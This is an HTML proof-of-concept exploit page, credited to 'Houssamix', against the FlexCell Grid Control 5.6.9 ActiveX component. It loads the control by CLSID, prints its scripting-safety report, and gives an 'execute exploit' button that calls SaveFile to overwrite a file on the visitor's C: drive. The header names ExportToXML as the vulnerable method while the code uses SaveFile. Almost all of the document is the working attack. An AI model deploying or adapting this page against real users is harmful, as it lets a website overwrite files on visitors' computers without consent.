<HTML> <BODY> <b> Author : Houssamix <br/> <br/> <br/> FlexCell Grid Control 5.6.9 Remote File Overwrite Exploit <br/> ExportToXML() is vuln to <br/> <b/> <object id=hsmx classid="clsid:{2A7D9CCE-211A-4654-9449-718F71ED9644}"></object> <SCRIPT> /* Report for Clsid: {2A7D9CCE-211A-4654-9449-718F71ED9644} RegKey Safe for Script: Faux RegKey Safe for Init: Faux Implements IObjectSafety: Vrai IDisp Safe: Safe for untrusted: caller,data IPersist Safe: Safe for untrusted: caller,data IPStorage Safe: Safe for untrusted: caller,data */ function hehe() { File = "c:\\hsmx.txt" hsmx.SaveFile(File) } </SCRIPT> <input language=JavaScript onclick=hehe() type=button value="execute exploit"><br> </body> </HTML>